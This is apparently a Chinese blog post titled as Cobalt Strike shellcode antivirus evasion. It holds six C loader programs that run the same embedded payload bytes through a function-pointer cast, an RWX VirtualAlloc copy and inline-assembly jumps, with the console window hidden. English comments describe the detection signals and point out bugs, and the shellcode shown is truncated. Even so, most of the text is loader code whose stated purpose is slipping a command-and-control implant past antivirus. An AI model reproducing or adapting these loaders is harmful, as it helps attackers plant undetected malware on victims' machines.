  • Cobalt Strike 生成shellcode免杀 楼下的小可怜

    • 生成shellcode
    • C加载实现免杀(以下六段代码中的 shellcode 字节完全相同,区别只在于如何把执行流转到该数组)
    #include <windows.h>
    #include <stdio.h>
    /* Linker directive: the image is marked as GUI subsystem while keeping the
     * console CRT entry point, so main() runs without a console window. */
    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
    /* Payload bytes kept as initialised data (48 bytes shown on the page).
     * The visible prologue decodes as x86: cld; call +0x89; pushad;
     * mov ebp,esp; xor edx,edx; mov edx,fs:[edx+0x30] (a read of the PEB
     * pointer from the TEB). The same bytes appear unchanged in every listing
     * on this page, so a content signature on this array matches all of them. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* Entry point: treats the address of the data array as a function taking
     * no arguments and calls it. No memory is allocated and no protection is
     * changed, so the bytes are executed from wherever the linker placed the
     * array. Where DEP/NX is enforced and that section is not executable, the
     * call raises an access violation; DEP is the mitigation aimed at this
     * pattern. */
    void main()
    {
     /* Cast &shellcode to void(*)(void) and invoke it. */
     ((void(*)(void))&shellcode)();
    }
    
    #include <windows.h>
    #include <stdio.h>
    /* Linker directive: GUI subsystem with the console CRT entry point, so
     * main() runs without a console window. */
    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
    /* Payload bytes as initialised data (48 bytes shown). The array is only
     * the copy source in this listing; the bytes are still present verbatim in
     * the file on disk, where static content matching can see them. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* Entry point: allocates a new region, copies the byte array into it and
     * calls the copy.
     *
     * Detection-relevant behaviour visible here:
     *  - The region is requested readable, writable and executable at once
     *    (PAGE_EXECUTE_READWRITE). Private RWX memory that then receives code
     *    is a commonly monitored loader behaviour (API monitoring around
     *    VirtualAlloc, scanning of private executable regions).
     *  - Control is transferred into memory that is not backed by any module
     *    on disk.
     *
     * Both error checks only show a message box and then fall through to the
     * next statement. memcpy returns its destination argument, so the second
     * check does not detect a failed copy.
     * NOTE(review): CODE is not declared anywhere in this listing. */
    void main()
    {
         PVOID p = NULL;
                   /* Commit and reserve sizeof(shellcode) bytes as RWX memory. */
                   if((p = VirtualAlloc(NULL,sizeof(shellcode),MEM_COMMIT|MEM_RESERVE,PAGE_EXECUTE_READWRITE)) == NULL)
                                   MessageBox(NULL,"VirtuallAlloc Failed!!!","Prompt",MB_OK);
                   /* Copy the array, including its terminating NUL, into the region. */
                   if(!(memcpy(p,shellcode,sizeof(shellcode))))
                                   MessageBox(NULL,"WriteMemory Failed!!!","Prompt",MB_OK);
                   /* Reinterpret the region as a callable and invoke it. */
                   CODE code = (CODE)p;  
                   code();  
    }
    
    #include <windows.h>
    #include <stdio.h>
    /* Linker directive: GUI subsystem with the console CRT entry point, so
     * main() runs without a console window. */
    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
    /* Payload bytes as initialised data (48 bytes shown); byte-for-byte the
     * same array as in the other listings on this page. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* Entry point: transfers control to the data array with MSVC inline
     * assembly (the __asm block form is accepted only for 32-bit x86 builds).
     * Unlike a call, the jmp pushes no return address, so main() is not
     * returned to. Only the few bytes of this stub differ from the
     * cast-and-call listing; the array contents and the memory it is executed
     * from are the same, so content signatures on the array and DEP apply
     * equally. */
    void main()
    {
                   /* eax = address of shellcode; jump to it. */
                   __asm
                   {  
                                   lea eax,shellcode;  
                                   jmp eax;  
                   }  
    }
    
    #include <windows.h>
    #include <stdio.h>
    /* Linker directive: GUI subsystem with the console CRT entry point, so
     * main() runs without a console window. */
    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
    /* Payload bytes as initialised data (48 bytes shown); byte-for-byte the
     * same array as in the other listings on this page. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* Entry point: loads the array's address as an immediate (mov eax,offset)
     * and jumps to it, using MSVC 32-bit inline assembly. The effect matches
     * the lea/jmp listing: same target, same bytes executed, same memory
     * region. Only the instruction used to form the address differs. */
    void main()
    {
       /* eax = offset of shellcode; jump to it. */
       __asm  
                   {  
                                   mov eax,offset shellcode;  
                                   jmp eax;
                   }  
    }
    
    #include <windows.h>
    #include <stdio.h>
    /* Linker directive: GUI subsystem with the console CRT entry point, so
     * main() runs without a console window. */
    #pragma comment(linker,"/subsystem:\"windows\" /entry:\"mainCRTStartup\"")
    /* Payload bytes as initialised data (48 bytes shown); byte-for-byte the
     * same array as in the other listings on this page. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* Entry point: loads the array's address into eax, then places the two
     * raw bytes FF E0 into the instruction stream with _emit. FF E0 is the
     * x86 encoding of `jmp eax`, so the machine code should match what the
     * mnemonic form produces. The difference exists only in the source text
     * and gives no difference for tools that inspect the compiled binary or
     * its runtime behaviour. */
    void main()
    {
                    /* eax = offset of shellcode; FF E0 = jmp eax. */
                    __asm
                   {
                                   mov eax,offset shellcode;
                                   _emit 0xFF;
                                   _emit 0xE0;
                   } 
    }
    
    #include <windows.h>
    #include <stdio.h>
    /* Payload bytes as initialised data (48 bytes shown). Nothing in this
     * listing references the array; it is present only as data. */
    unsigned char shellcode[] =
    "\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b"
    "\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0"
    "\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57";
    /* One-byte array holding only the string terminator (0x00). */
    unsigned char noshellcode[] = "";
    /* Entry point: calls the address of noshellcode, not shellcode. The
     * payload array is therefore carried in the file but never executed.
     * NOTE(review): this looks like a control sample for checking whether a
     * scanner flags the embedded bytes alone, independent of how they are
     * run; the page does not state its purpose. Calling a one-byte array that
     * holds 0x00 has no defined result. */
    void main()
    {
      /* Cast &noshellcode to void(*)(void) and invoke it. */
      ((void(*)(void))&noshellcode)();
    }
    
  • 原文地址:https://www.cnblogs.com/w0x68y/p/12217039.html